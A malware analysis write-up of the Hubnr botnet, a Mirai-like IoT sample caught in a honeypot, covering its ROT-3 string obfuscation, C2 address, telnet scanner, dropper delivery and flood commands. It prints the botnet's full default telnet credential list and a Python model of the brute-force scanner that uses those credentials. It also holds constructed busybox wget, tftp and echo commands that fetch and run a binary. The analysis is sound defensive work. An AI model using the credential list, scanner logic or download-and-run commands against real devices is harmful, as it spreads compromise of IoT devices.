carbreal - Hubnr Botnet
github.com/carbreal/Malware_Analysis/tree/master/Hubnr_botnet

Today, April 3rd 2021, I found the following sample in my honeypot:

arm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped
hash: fe7fb996b997877216d782a7adbcbe6a37bc585d459c6d0d452a346b078157c6

At first sight it looks like a Mirai variant, but it has some interesting differences. First, it doesn't encode its strings with the usual XOR function. Two functions do the job instead, util_encrypt() and util_decrypt(), and they just apply a 3-character rotation to the strings (a Caesar shift, so the strings are trivially recoverable once the routine is spotted, but they do not show up in a plain strings run).

https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/encdec.png

In the main function we see the first util_decrypt() call. It decodes the variable proc_name, which returns "/dev/hubnr". Then it runs the two main functions, hakka_con() and parse_buf(). hakka_con() connects to the server and runs scanner_init(). To get the master IP it calls util_decrypt() again, this time on the variable bot_host. This sample connects to the IP 194.113.107.243.

https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/procmem.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/procdec.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/main.png

scanner_init() is the function that handles self-propagation. I don't fully understand the entire logic behind this huge function, but I'd say that it works like a state machine: it has a for loop that iterates through a state variable and a switch-case that goes through each state.
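Added example (not the sample's code): a ROT-3 encoder/decoder for the util_encrypt()/util_decrypt() scheme, plus a scan over a byte blob that flags NUL-terminated runs which decode to printable text. That is how proc_name and bot_host can be recovered from the binary's data section without stepping through util_decrypt() in a debugger. It assumes util_encrypt() adds 3 to every byte and util_decrypt() subtracts 3 (the direction and the byte range have to be confirmed in the disassembly); the blob it scans is constructed for the example, not taken from the sample.

```python
"""ROT-3 string obfuscation as described for util_encrypt()/util_decrypt(),
plus a scan that recovers obfuscated strings from a byte blob.

Added example, not the sample's own code. Assumption: util_encrypt() adds 3
to every byte and util_decrypt() subtracts 3 (confirm the direction and the
byte range in the disassembly). SAMPLE_BLOB is constructed for this example."""
import re

SHIFT = 3

def util_encrypt(s: bytes, shift: int = SHIFT) -> bytes:
    return bytes((b + shift) & 0xFF for b in s)

def util_decrypt(s: bytes, shift: int = SHIFT) -> bytes:
    return bytes((b - shift) & 0xFF for b in s)

# Constructed stand-in for a .rodata region: a plain string, two obfuscated
# strings (proc_name and bot_host, as named in the writeup) and some binary
# noise, all NUL-terminated.
SAMPLE_BLOB = (
    b"\x00\x00plain_string\x00"
    + util_encrypt(b"/dev/hubnr") + b"\x00"
    + b"\x7fELF\x01\x01\x01\x00"
    + util_encrypt(b"194.113.107.243") + b"\x00"
)

PRINTABLE = re.compile(rb"[\x20-\x7e]+")
IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")

def find_rot_strings(blob: bytes, shift: int = SHIFT, min_len: int = 4):
    """(offset, decoded) for every NUL-free run of at least min_len bytes whose
    ROT-shift decoding is entirely printable ASCII. Plain strings whose
    shifted form also happens to be printable show up too, so expect some
    false positives and filter on meaning (paths, IPs, URLs, commands)."""
    hits = []
    for m in re.finditer(rb"[^\x00]{%d,}" % min_len, blob):
        dec = util_decrypt(m.group(0), shift)
        if PRINTABLE.fullmatch(dec):
            hits.append((m.start(), dec.decode("ascii")))
    return hits

def recover_c2(blob: bytes, shift: int = SHIFT):
    """First decoded string that looks like an IPv4 address (the bot_host value)."""
    for _, s in find_rot_strings(blob, shift):
        if IPV4.match(s):
            return s
    return None
```

Run find_rot_strings() over the whole file rather than only .rodata: statically linked Mirai-style binaries keep their tables wherever the compiler put them, and the false positives are cheap to discard by eye. If the shift in the real util_decrypt() turns out to be the other way round, only the sign in the two helpers changes.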
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/hakka.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/ipvar.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/ipmem.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/ipdec.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/scanner_1.png

It has a state that runs a telnet scan and performs a brute force with a few stored credentials:

https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/scanner_2.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/scanner_3.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/credentialsmem.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/credentials.png

(The two screenshots above are hex dumps of the username and password tables in memory; the readable version follows.)

https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/credentials_ord.png

Usernames:
manager
root
default
guest
admin
Admin
user
support
telnetadmin

Passwords:
root
default
telnetadmin
friend
solokey
t0talc0ntr0l4!
tsgoingon
12345
ViZXV
123456
xc3511
Zte521
ZLXxX.
5up
OxhLwSG8
S2fTGqNFs
7ujMko0admin
1234
hslwificam
uidd
hipc3518
2601hx
ho4uku6at
taZz@01

Then, if the login is successful, it runs some recon commands and, depending on the output, fetches the appropriate binary for the architecture.
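Added example, not the sample's code: a Python model of the loop-plus-switch design described above, driven with the username and password lists recovered from the sample and a constructed telnet target that stands in for a real socket. The state names, trying every username/password combination (the screenshots show the two lists separately, not how the binary pairs them) and the cat /proc/cpuinfo recon command are assumptions, so this shows the shape of the scanner, not the exact states in the disassembly.

```python
"""Model of the scanner_init() design described above: a loop over open
connections and a switch on each connection's state, driven with the
username and password lists recovered from the sample.

Added example, not the sample's own code. Assumptions: the state names,
trying every username/password combination, and the recon command.
FakeTarget is a constructed stand-in for a telnet socket so this runs
offline."""
from enum import Enum, auto
import itertools

USERNAMES = ["manager", "root", "default", "guest", "admin", "Admin",
             "user", "support", "telnetadmin"]
PASSWORDS = ["root", "default", "telnetadmin", "friend", "solokey",
             "t0talc0ntr0l4!", "tsgoingon", "12345", "ViZXV", "123456",
             "xc3511", "Zte521", "ZLXxX.", "5up", "OxhLwSG8", "S2fTGqNFs",
             "7ujMko0admin", "1234", "hslwificam", "uidd", "hipc3518",
             "2601hx", "ho4uku6at", "taZz@01"]
CRED_PAIRS = list(itertools.product(USERNAMES, PASSWORDS))  # assumed pairing
RECON_CMD = b"cat /proc/cpuinfo\r\n"                         # assumed recon

class State(Enum):
    CONNECTING = auto()
    WAIT_LOGIN = auto()     # wait for the "login:" prompt
    SEND_USER = auto()
    WAIT_PASS = auto()      # wait for the "Password:" prompt
    SEND_PASS = auto()
    CHECK_RESULT = auto()   # shell prompt or "Login incorrect"?
    RECON = auto()          # collect the recon output
    DONE = auto()
    FAILED = auto()         # credential list exhausted

class FakeTarget:
    """Constructed telnet device: prompts for login, accepts exactly one
    (user, password) pair and then answers the recon command."""
    def __init__(self, host, valid):
        self.host, self.valid = host, valid
        self.out, self.user, self.shell = b"login: ", None, False

    def recv(self):
        data, self.out = self.out, b""
        return data

    def send(self, data):
        line = data.rstrip(b"\r\n").decode()
        if self.shell:
            self.out = (b"model name : ARMv7 Processor rev 1 (v7l)\n# "
                        if "cpuinfo" in line else b"# ")
        elif self.user is None:
            self.user, self.out = line, b"Password: "
        elif (self.user, line) == self.valid:
            self.shell, self.out = True, b"BusyBox built-in shell\n# "
        else:
            self.user, self.out = None, b"Login incorrect\nlogin: "

class Conn:
    def __init__(self, target):
        self.target, self.state = target, State.CONNECTING
        self.cred_idx, self.buf = 0, b""
        self.found, self.recon = None, b""

def step(conn):
    """One pass through the switch-case for a single connection."""
    st = conn.state
    if st is State.CONNECTING:
        conn.state = State.WAIT_LOGIN
    elif st is State.WAIT_LOGIN:
        conn.buf += conn.target.recv()
        if b"login:" in conn.buf.lower():
            conn.buf, conn.state = b"", State.SEND_USER
    elif st is State.SEND_USER:
        if conn.cred_idx >= len(CRED_PAIRS):
            conn.state = State.FAILED
            return
        conn.target.send(CRED_PAIRS[conn.cred_idx][0].encode() + b"\r\n")
        conn.state = State.WAIT_PASS
    elif st is State.WAIT_PASS:
        conn.buf += conn.target.recv()
        if b"password:" in conn.buf.lower():
            conn.buf, conn.state = b"", State.SEND_PASS
    elif st is State.SEND_PASS:
        conn.target.send(CRED_PAIRS[conn.cred_idx][1].encode() + b"\r\n")
        conn.state = State.CHECK_RESULT
    elif st is State.CHECK_RESULT:
        conn.buf += conn.target.recv()
        if b"incorrect" in conn.buf.lower():
            conn.cred_idx += 1      # next pair; the buffer still holds "login:"
            conn.state = State.WAIT_LOGIN
        elif b"# " in conn.buf or b"$ " in conn.buf:
            conn.found = CRED_PAIRS[conn.cred_idx]
            conn.buf, conn.state = b"", State.RECON
            conn.target.send(RECON_CMD)
    elif st is State.RECON:
        conn.recon += conn.target.recv()
        if b"# " in conn.recon:
            conn.state = State.DONE

def run_scanner(targets, max_rounds=5000):
    """The outer loop: keep stepping every live connection until all are
    DONE or FAILED. Returns {host: (credentials found, recon output)}."""
    conns = [Conn(t) for t in targets]
    for _ in range(max_rounds):
        active = [c for c in conns if c.state not in (State.DONE, State.FAILED)]
        if not active:
            break
        for c in active:
            step(c)
    return {c.target.host: (c.found, c.recon) for c in conns}
```

The point of the structure is that nothing blocks: every connection advances one state per round, so one process can keep hundreds of telnet sessions in flight, which is why Mirai-style scanners are written this way. Replace FakeTarget with a non-blocking socket and the step() function stays the same.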
It has a few ways of getting the binary onto the victim's machine: with wget, with tftp, or by echoing it in. Basically, these are the commands used in the different states:

https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/scanner_4.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/scancommands.png

It has 5 different droppers embedded, targeting 5 different architectures. A payloads variable points to the memory address of each dropper, and it is used by the get_retrieve_binary() function inside the state. The dropper is a very small binary that only retrieves the sample from the master.

https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/payloadsmem.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/binarymem.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/droppers_bin.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/droppers.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/dropper_diss.png

The other main function is parse_buf(). This one gets the command from the master. At the moment it has 4 different options: a PING option that just reports back to the master that the bot is alive, "killproc", which kills the process, and two different attack capabilities, "udpflood" and "tcpflood".

It's very interesting that it also has http_send() and http_attack() functions, with 5 different user agents in memory, and the HTTP request template is also stored. It's used in the http_attack() function, which uses 4 different variables that are empty at the moment.
I assume that when the new functionality is implemented the master will be able to select different payloads, but that's not possible yet.

https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/parse_buff_comp.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/parse_buff_mem.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/parse_buff_dec.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/http_send.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/http_attack.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/http_attack_var.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/http_vars.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/useragentsmem.png
https://github.com/carbreal/Malware_Analysis/blob/master/Hubnr_botnet/Screenshots/useragents_ord.png

Readable fragments from the screenshots above (as extracted; truncated where the screenshot cuts them off):

char const data_1a324[0x1e] = "Sending ...
char const data_1a344[0x5] = "POST"
HTTP request template: "... HTTP/1.1\r\n", "Host: % ...", "User-...", "Conne..."
int32_t data_29648, data_2964c, data_29650, data_29654
User agents: "... (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1", "... (Windows NT 6.1; WOW64) AppleWebK... (KHTML, like Gecko) Chrome/19.0.1 ...", "Mozilla/5..."
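Added example, not the sample's code, for the three delivery methods used in the scanner states described earlier (wget, tftp, echo): a parser for a captured telnet session that pulls out the download URLs and tftp transfers, replays the echo redirects to rebuild the binary that was written in hex chunks, and reads the target architecture from the ELF header, which is the same information the bot needs to pick one of its 5 droppers. The session transcript is constructed (TEST-NET address, placeholder file names); the real commands are only visible in the scancommands screenshot.

```python
"""Pull the three delivery methods used by the scanner states (wget, tftp,
echo) out of a captured telnet session, rebuild a binary that was echoed
in piece by piece, and read its target architecture from the ELF header.

Added example, not the sample's own code. SESSION is a constructed
transcript (TEST-NET address, placeholder file names)."""
import codecs
import re
import shlex
import struct

SESSION = [                      # constructed, mimics a busybox session
    "enable", "sh",
    "/bin/busybox wget http://192.0.2.10/arm7 -O /tmp/.x; chmod 777 /tmp/.x",
    "/bin/busybox tftp -g -r arm7 -l /tmp/.t 192.0.2.10",
    r"/bin/busybox echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00' > /tmp/.e",
    r"/bin/busybox echo -ne '\x02\x00\x28\x00\x01\x00\x00\x00' >> /tmp/.e",
    "chmod 777 /tmp/.e; /tmp/.e",
]

WGET_RE = re.compile(r"\bwget\b.*?(https?://\S+)")
ECHO_RE = re.compile(r"\becho\s+-(?:ne|en|e)\s+'([^']*)'\s*(>>|>)\s*(\S+)")
ELF_MACHINES = {0x03: "x86", 0x08: "mips", 0x14: "ppc", 0x28: "arm",
                0x2a: "sh", 0x3e: "x86_64", 0xb7: "aarch64"}

def split_commands(lines):
    """Break each captured line at ; && || so every command is seen alone."""
    for line in lines:
        for cmd in re.split(r"\s*(?:;|&&|\|\|)\s*", line):
            if cmd:
                yield cmd

def parse_tftp(args):
    """busybox tftp: -g get, -r REMOTE, -l LOCAL, then HOST [PORT]."""
    remote = host = None
    i = 0
    while i < len(args):
        if args[i] == "-r":
            remote, i = args[i + 1], i + 2
        elif args[i] == "-l":
            i += 2
        elif args[i].startswith("-"):
            i += 1
        else:
            host = host or args[i]
            i += 1
    return remote, host

def parse_session(lines):
    """Return {'wget': [urls], 'tftp': [(remote_file, host)]}."""
    found = {"wget": [], "tftp": []}
    for cmd in split_commands(lines):
        m = WGET_RE.search(cmd)
        if m:
            found["wget"].append(m.group(1))
        tokens = shlex.split(cmd)
        names = [t.rsplit("/", 1)[-1] for t in tokens]   # /bin/busybox tftp
        if "tftp" in names:
            found["tftp"].append(parse_tftp(tokens[names.index("tftp") + 1:]))
    return found

def rebuild_echoed_files(lines):
    """Replay every echo -ne '...' > or >> redirect into an in-memory file map."""
    files = {}
    for cmd in split_commands(lines):
        m = ECHO_RE.search(cmd)
        if not m:
            continue
        chunk = codecs.decode(m.group(1), "unicode_escape").encode("latin-1")
        path = m.group(3)
        files[path] = chunk if m.group(2) == ">" else files.get(path, b"") + chunk
    return files

def elf_arch(data):
    """'32-bit LSB arm' style summary from e_ident and e_machine, or None."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    bits = {1: "32-bit", 2: "64-bit"}.get(data[4], "?")
    little = data[5] == 1
    (machine,) = struct.unpack_from("<H" if little else ">H", data, 18)
    return f"{bits} {'LSB' if little else 'MSB'} {ELF_MACHINES.get(machine, hex(machine))}"
```

On a honeypot the echo path is the one worth replaying: wget and tftp leave a URL or a host to block, but an echoed-in dropper never touches the network as a file, so reassembling it from the session log is the only way to get a hash of it.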